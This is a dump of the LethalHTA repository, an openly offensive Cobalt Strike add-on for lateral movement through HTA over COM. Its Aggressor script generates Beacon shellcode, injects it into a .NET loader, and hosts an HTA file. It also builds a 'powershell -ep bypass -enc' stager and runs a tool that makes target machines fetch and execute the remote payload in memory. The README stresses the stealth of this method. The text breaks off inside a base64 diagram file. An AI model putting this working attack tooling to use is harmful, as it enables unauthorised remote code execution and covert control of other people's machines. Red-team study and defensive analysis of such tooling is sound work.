├── .gitattributes ├── .gitignore ├── CobaltStrike ├── LethalHTA.cna ├── LethalHTADotNet.exe ├── README.md ├── SCLoader.bin ├── SCLoader │ ├── SCLoader.sln │ └── SCLoader │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── SCLoader.cs │ │ └── SCLoader.csproj ├── dotNetJScriptTemplate.hta └── figures │ ├── lethalhta-deploy-stageless.png │ ├── lethalhta-menu-staged.png │ ├── lethalhta-menu-stageless-session-0.png │ ├── lethalhta-menu-stageless-winver.png │ ├── lethalhta-menu-stageless.png │ ├── lethalhta-menu.png │ ├── lethalhta-stageless-flow.png │ └── lethalhta-stageless-flow.xml ├── DISCLAIMER.md ├── DotNet ├── .gitattributes ├── .gitignore ├── LethalHTADotNet.sln ├── LethalHTADotNet │ ├── App.config │ ├── ComUtils.cs │ ├── FakeObject.cs │ ├── Interfaces.cs │ ├── LethalHTA.cs │ ├── LethalHTADotNet.csproj │ └── Properties │ │ └── AssemblyInfo.cs └── README.md ├── LICENSE ├── Native ├── LethalHTA.sln ├── LethalHTA │ ├── LethalHTA.cpp │ ├── LethalHTA.vcxproj │ ├── LethalHTA.vcxproj.filters │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h └── README.md └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | # Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /CobaltStrike/LethalHTA.cna: -------------------------------------------------------------------------------- 1 | # 2 | # LethalHTADotNet integration for Cobalt Strike 3 | # 4 | # (c) 2018 Code White GmbH - Markus Piéton 5 | # 6 | # CNA-Script is inspired by rsmudge/stagelessweb.cna 7 | # (https://gist.github.com/rsmudge/629bd4ddce3bbbca1f8c16378a6a419c) 8 | # 9 | debug(5); 10 | 11 | # define our top-level menubar 12 | menubar("&LethalHTA", "lethalhta"); 13 | 14 | global('$HTA_TEMPLATE'); 15 | 16 | $LETHAL_HTA_URL = "https://codewhitesec.blogspot.com/2018/07/lethalhta.html"; 17 | 18 | $PATH_TO_SCLOADER = script_resource("SCLoader.bin"); 19 | $PATH_TO_DOTNETJSCRIPT_TEMPLATE = script_resource("dotNetJScriptTemplate.hta"); 20 | $PATH_TO_LETHALHTPDOTNET = script_resource("LethalHTADotNet.exe"); 21 | 22 | $HTA_TEMPLATE = ''; 23 | 24 | # setup our stageless HTA attack 25 | sub setup_stageless { 26 | local('%options $target $ssl $bid $hta $shellcode $readytouse $lhtadotnet $url $handle $scloader $payload $payloadx86 $index_payload_x86 $payloadx64 $index_payload_x64'); 27 | 28 | %options = $3; 29 | 30 | $target = %options["target"]; 31 | $bid = %options["bid"]; 32 | 33 | if ($target eq "") { 34 | blog($bid, , "Target not specified!"); 35 | return; 36 | } 37 | 38 | ############################################################### 39 | ## Clean-up already registered content and redirects 40 | 41 | site_kill(%options["port"], %options["uri"]); 42 | 43 | if (%options["rdr"] eq "true") { 44 | brportfwd_stop($bid, %options["rdrport"]); 45 | } 46 | 47 | ############################################################### 48 | ## Read SCLoader.bin 49 | 50 | # read in the executable template 51 | $handle = openf($PATH_TO_SCLOADER); 52 | $scloader = readb($handle, -1); 53 | closef($handle); 54 | 55 | # find the location of our shellcode in SCLoader 56 | $index_payload_x86 = indexOf($scloader, "\x01\x02\x03\x04\x05\x06\x07"); 57 | $index_payload_x64 = indexOf($scloader, "\x07\x06\x05\x04\x03\x02\x01"); 58 | 59 | ############################################################### 60 | ## Generate Payloads (x86 and x64 stageless) 61 | 62 | # generate our stageless x86 raw-payload. We're going to make *this* function 63 | # the callback for this call. That's why we yield after. 64 | artifact_stageless(%options["listener"], "raw", "x86", %options["proxy"], $this); 65 | yield; 66 | 67 | # this function is now resumed after &artifact_stageless finished. $1 is our payload. 68 | $payloadx86 = gzip($1); 69 | 70 | # generate our stageless x64 raw-payload. We're going to make *this* function 71 | # the callback for this call. That's why we yield after. 72 | artifact_stageless(%options["listener"], "raw", "x64", %options["proxy"], $this); 73 | yield; 74 | 75 | # this function is now resumed after &artifact_stageless finished. $1 is our payload. 76 | $payloadx64 = gzip($1); 77 | 78 | # Replace dummy bytes inside SCLoader with our shellcode 79 | $payload = replaceAt($scloader, "$[204800]payloadx86", $index_payload_x86); 80 | $payload = replaceAt($payload, "$[204800]payloadx64", $index_payload_x64); 81 | $payload = base64_encode($payload); 82 | 83 | ############################################################### 84 | ## Create HTA String 85 | 86 | # read in the executable template 87 | $handle = openf($PATH_TO_DOTNETJSCRIPT_TEMPLATE); 88 | $hta = readb($handle, -1); 89 | closef($handle); 90 | 91 | $hta = strrep($hta, 'REPLACETHISWITHSERIALIZEDOBJECT', $payload); 92 | 93 | ############################################################### 94 | ## Host the HTA file 95 | 96 | $ssl = iff(%options["ssl"] eq "true", true, false); 97 | 98 | # host the payload! 99 | $url = site_host(%options["host"], %options["port"], %options["uri"], $hta, "text/plain", "LethalHTA \(.NET - stageless - x86/x64\)", $ssl); 100 | 101 | if ($url eq "") { 102 | blog($bid, , "Error hosting content!"); 103 | return; 104 | } 105 | 106 | ############################################################### 107 | ## Beacon Redirect 108 | 109 | # check if we need to set-up a Beacon redirect 110 | if (%options["rdr"] eq "true") { 111 | $url = iff($ssl, "https", "http") . "://" . binfo($bid, "internal") . ":" . %options["port"] . %options["uri"]; 112 | brportfwd($bid, %options["rdrport"], %options["host"], %options["port"]); 113 | } 114 | 115 | ############################################################### 116 | ## Go Go Go! 117 | blog($bid, , "USING: execute-assembly " . $PATH_TO_LETHALHTPDOTNET . " \"$target\" \"$url\""); 118 | bexecute_assembly($bid, $PATH_TO_LETHALHTPDOTNET, "\"$target\" \"$url\""); 119 | } 120 | 121 | # 122 | sub testcmd { 123 | local('%options $bid $meta $key $value'); 124 | %options = $3; 125 | 126 | $meta = bdata(%options["bid"]); 127 | 128 | foreach $key => $value ($meta) { 129 | println("$[20]key : $value"); 130 | } 131 | } 132 | 133 | # 134 | sub setup_powershell { 135 | local('%options $target $ssl $bid $hta $shellcode $readytouse $lhtadotnet $url'); 136 | %options = $3; 137 | 138 | $target = %options["target"]; 139 | $bid = %options["bid"]; 140 | 141 | if ($target eq "") { 142 | blog($bid, , "Target not specified!"); 143 | return; 144 | } 145 | 146 | ############################################################### 147 | ## Clean-up already registered content and redirects 148 | 149 | site_kill(%options["port"], %options["uri"]); 150 | 151 | if (%options["rdr"] eq "true") { 152 | brportfwd_stop($bid, %options["rdrport"]); 153 | } 154 | 155 | ############################################################### 156 | ## Generate Payload 157 | 158 | $shellcode = shellcode(%options["listener"], false, "x86"); 159 | $readytouse = powershell_encode_stager($shellcode); 160 | 161 | ############################################################### 162 | ## Create HTA String 163 | 164 | $hta = strrep($HTA_TEMPLATE, 'REPLACEMEORELSE', "powershell -ep bypass -enc $readytouse"); 165 | 166 | ############################################################### 167 | ## Host the HTA file 168 | 169 | $ssl = iff(%options["ssl"] eq "true", true, false); 170 | 171 | # host the payload! 172 | $url = site_host(%options["host"], %options["port"], %options["uri"], $hta, "text/plain", "LethalHTA \(powershell - staged - x86\)", $ssl); 173 | 174 | if ($url eq "") { 175 | blog($bid, , "Error hosting content!"); 176 | return; 177 | } 178 | 179 | ############################################################### 180 | ## Beacon Redirect 181 | 182 | # check if we need to set-up a Beacon redirect 183 | if (%options["rdr"] eq "true") { 184 | $url = iff($ssl, "https", "http") . "://" . binfo($bid, "internal") . ":" . %options["port"] . %options["uri"]; 185 | brportfwd($bid, %options["rdrport"], %options["host"], %options["port"]); 186 | } 187 | 188 | ############################################################### 189 | ## Go Go Go! 190 | blog($bid, , "USING: execute-assembly " . $PATH_TO_LETHALHTPDOTNET . " \"$target\" \"$url\""); 191 | bexecute_assembly($bid, $PATH_TO_LETHALHTPDOTNET, "\"$target\" \"$url\""); 192 | } 193 | 194 | sub show_dialog { 195 | local('$dialog %defaults'); 196 | 197 | # setup our defaults 198 | %defaults["target"] = ""; 199 | %defaults["uri"] = "/a"; 200 | %defaults["host"] = localip(); 201 | %defaults["port"] = 80; 202 | %defaults["proxy"] = ""; 203 | %defaults["rdr"] = false; 204 | %defaults["rdrport"] = 80; 205 | %defaults["ssl"] = false; 206 | 207 | # create our dialog 208 | $dialog = dialog($1, %defaults, $3); 209 | dialog_description($dialog, $2); 210 | drow_beacon($dialog, "bid", "Session: "); 211 | drow_listener_stage($dialog, "listener", "Listener: "); 212 | drow_text($dialog, "target", "Target (IP/Hostname): "); 213 | drow_text($dialog, "uri", "URI Path: ", 20); 214 | drow_text($dialog, "host", "HTTP(S) Host: "); 215 | drow_text($dialog, "port", "HTTP(S) Port: "); 216 | drow_checkbox($dialog, "ssl", "Use SSL/TLS: "); 217 | if (-istrue $4) { 218 | drow_proxyserver($dialog, "proxy", "Proxy: "); 219 | drow_checkbox($dialog, "rdr", "Redirect via Beacon: ", "Use Beacon as the HTTP Host (via port forwarding)"); 220 | drow_text($dialog, "rdrport", "HTTP Redirect-Port: ", "Ignored if 'Redirect via Beacon' isn't used."); 221 | } 222 | dbutton_action($dialog, "Launch"); 223 | dbutton_help($dialog, $LETHAL_HTA_URL); 224 | 225 | # show our dialog 226 | dialog_show($dialog); 227 | } 228 | 229 | # 230 | popup lethalhta { 231 | item "HTA &PowerShell Delivery (staged - x86)" { 232 | show_dialog("PowerShell LethalHTA (staged)", "A staged PowerShell version of the LethalHTA attack.", &setup_powershell); 233 | } 234 | 235 | item "HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic)" { 236 | show_dialog(".NET LethalHTA (stageless)", "A stageless .NET version of the LethalHTA attack using DotNetToJScript.", &setup_stageless, true); 237 | } 238 | } 239 | -------------------------------------------------------------------------------- /CobaltStrike/LethalHTADotNet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/LethalHTADotNet.exe -------------------------------------------------------------------------------- /CobaltStrike/README.md: -------------------------------------------------------------------------------- 1 | # LethalHTA.NET CobaltStrike Integration 2 | 3 | The CobaltStrike Aggressor Script *lethalhta.cna* provides two lateral-movement options that use the LethalHTA attack vector. 4 | 5 | * *HTA PowerShell Delivery (staged - x86)* and 6 | * *HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic)* 7 | 8 | ![LethalHTA Menu](./figures/lethalhta-menu.png) 9 | 10 | ## HTA PowerShell Delivery (staged - x86) 11 | 12 | The *HTA PowerShell Delivery* methods allows to execute a PowerShell based, staged Beacon on the target system via HTA over COM using the *LethalHTADotNet* tool. 13 | 14 | ![LethalHTA PowerShell Dialog](./figures/lethalhta-menu-staged.png) 15 | 16 | *Hint:* Since the PowerShell beacon is staged, the target systems need to be able to reach the HTTP(S) host and TeamServer (in most cases this is the same). 17 | 18 | ## HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic) 19 | 20 | The *HTA .NET Delivery* provides far more flexibility in terms of payload delivery and stealth. Not only it is possible to tunnel the HTA delivery/retrieval process through the Beacon systems, but also to specify a proxy server. If the target system is not able to reach the TeamServer or any other Internet-connected system a *SMB* listener can be used. This bootstraps the SMB-listener on the target and the operator is now able to connect to the target via linking (`link `) the two beacons. 21 | 22 | In addition due to the techniques used, everything is done in the *mshta.exe* process without ever touching disk or creating additional processes. 23 | 24 | ![LethalHTA .NET Delivery Dialog](./figures/lethalhta-menu-stageless.png) 25 | 26 | ### Delivery Overview 27 | 28 | The combination of two techniques, in addition to the HTA attack vector, is needed to execute everything in-memory. Utilizing the excellent [*DotNetToJScript*](https://github.com/tyranid/DotNetToJScript) tool by James Forshaw, we are able to load a small .NET class (*SCLoader*) that dynamically determines the processes architecture (x86 or x64) and then executes the included stageless Beacon shellcode. 29 | 30 | ![LethalHTA .NET Delivery Flow](./figures/lethalhta-stageless-flow.png) 31 | 32 | As shown in the figure above the HTA object is created on the target system via COM (step 1). Then the target retrieves the HTA file via HTTP (step 2) and executes the included JScript (step 3) inside *mshta.exe*. Steps 4 - 7 are the normal *DotNetToJScript* execution mode. The class loaded by step 7 (*SCLoader*) determines the current processes architecture (step 8), decompresses the right shellcode (step 9) and executes it in the same process by creating a new Thread (step 10). 33 | 34 | As the required 32- and 64-bit shellcode of the Beacons need to be generated on-the-fly by the CobaltStrike Client, the output of *DotNetToJScript* needs to be modified, so the Aggressor Script is able to inject the right shellcode into SCLoader before delivery. The SCLoader output generated by *DotNetToJScript* needs to be split into a template HTA file (*dotNetJScriptTemplate.js*) that contains the code to load the .NET Framework and our *SCLoader* class. And another file *SCLoader.bin* containing the Base64-decoded content of the variable *serialized_obj* of *DotNetToJScript*. 35 | 36 | The following command line can be used to create the output file *SCLoaderOuput.js*. Afterwards the content of *serialized_obj* needs to be Base64-decoded and stored in the file *SCLoader.bin*. 37 | 38 | DotNetToJScript.exe -d -l JScript -v Auto -o SCLoaderOuput.js -c SCLoader.SCLoader SCLoader\SCLoader\bin\Release\SCLoader.dll 39 | -------------------------------------------------------------------------------- /CobaltStrike/SCLoader.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/SCLoader.bin -------------------------------------------------------------------------------- /CobaltStrike/SCLoader/SCLoader.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27428.2037 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SCLoader", "SCLoader\SCLoader.csproj", "{784CDE17-FF0F-4E43-911A-19119E89C43F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {784CDE17-FF0F-4E43-911A-19119E89C43F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {784CDE17-FF0F-4E43-911A-19119E89C43F}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {784CDE17-FF0F-4E43-911A-19119E89C43F}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {784CDE17-FF0F-4E43-911A-19119E89C43F}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {D424AA5C-32F3-4CBA-9896-6636100E90BB} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /CobaltStrike/SCLoader/SCLoader/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SCLoader")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SCLoader")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("784cde17-ff0f-4e43-911a-19119e89c43f")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /CobaltStrike/SCLoader/SCLoader/SCLoader.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {784CDE17-FF0F-4E43-911A-19119E89C43F} 8 | Library 9 | Properties 10 | SCLoader 11 | SCLoader 12 | v2.0 13 | 512 14 | 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | false 25 | 26 | 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | false 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /CobaltStrike/dotNetJScriptTemplate.hta: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-deploy-stageless.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-deploy-stageless.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu-staged.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu-staged.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu-stageless-session-0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu-stageless-session-0.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu-stageless-winver.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu-stageless-winver.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu-stageless.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu-stageless.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-stageless-flow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-stageless-flow.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-stageless-flow.xml: -------------------------------------------------------------------------------- 1 | 7V1dc5s4FP01nmkfkgGJz8f4I+3utLudcXb2WTayzQQjL+Ak7a9fCRAGJGKIAWPXzkNsQQS69+iec6+EM4KT7duXAO0234mDvRFQnLcRnI4AUCGw6S/W8jNpAUBRkpZ14DrpWYeGufsLp438tL3r4LBwYkSIF7m7YuOS+D5eRoU2FATktXjainjFq+7QGgsN8yXyxNZ/XSfaJK2Wrhzav2J3veFXVvn4Fmj5vA7I3k+vNwJwFb+Sw1vE+0rPDzfIIa+5JjgbwUlASJS8275NsMeMy82W/N1jxdHsvgPsR3X+ACBlZcOFvjQhXlnYvEt7eEHeHvMhGB7ta+y4L+yGo5+pkYz/9uwuxxF+i+6Q5679EXygZ3h4FR2O0nfr9HfcyyIot9Cbi7vmraBwFeC5Pn03DqOAPGfOoDhhNxRQ37uEXncakj07MN5EW48dp29XrudNiEcC+tkncScr4kcp2FSYfuanUE8p8Yu2p6OZLqkVcZBdPXfqw0yjMM/uN29wbkEcUMvkmlIHfMFki6PgJz2FH7VTMKSz5U5Lp8/rAXp8YmzyqNPT81CK9nXW9cHj9E3qdDkADIm/Sx5geN7VH2c2K9GC96C8P36zNH5gCuPPJkzeALp++viFCQCOGySe39hJcfa6cSM836ElO/pKA2IRhkXopEAsobmEVoqvR2BDdXYcso/xSwbZdYAcFx9OTq/Mm6e5yYNRyKYe86RLY+BD2lVE2FCyCKVK0W5UoED09lm8CQVvqoI7WQCr4TNJPBGMXjbh1nUcdhkpSHKuhco7rj3F6PxocYap5r0uTDFN4hPup1Z9olqVHLNRpRTDLHMXxqZiDKMauzeRYb4+sWN/+GGE/MhFMbYF0nlxET0pwFsSYfpm8vf3HA2xq1ewkAQj1Jmuv6af9MOnJzZlpndAqXA5oS5befF02lBoYL9egNDk8CtP8ZjCzAQ0OXDZTcKGPAi0AEFNL0BQhkDVkEBQawGCnCjfC+o0zu3Y28TRDtkn7MVc3SjelwK5o2PL0UqBXK+lMSywgIbRksYAxQigWxKJIYvKmgJOt7+qHbf/wHVeQCKU3oOttOMTCEtRWVdlk0Km/FTYgvK7Sf3+pb6uFaOgbBqK/oaG1kIQFLWQ4IHOpT4sjl+VGEAqDq2ML04yQY041IO4VxTb1qYXIO4zyAxD3fM+cu6DdZTawNV8AysPQM7rsopBEt7ZkJkzeDmPE4P6Dkd8XO//OV8G7o5dEL/h5T7R+4rrh67DpH2cDmS0s5BQUXK7Vyj4Y315ouLfkMD9RbtAfPgeWmDvBwndNK4If/+tdEI2W9pAvF4D8dL0AbYAeWnCem7mVIDEBJ2FXrVGBnVjzpzfrQrHn6kupgjuE/13eczZwMoDYE5QnXD1y5zbcBOhe8qaLIUjyAk5XSpJeezr09OPT+HnG30OlD6bw/6s9GmIWVcegbFse0LBGkdVMKobh/IlgZw/Lf457Vh9L0IJDq5P6tVRxyiStwFF69uGaP02ap9aDfHSUe1z9mCM4wLm0dpnCzaGpl20saSyoKkShFstFDgNszK0N6qlMUso5Rhu0RgeR9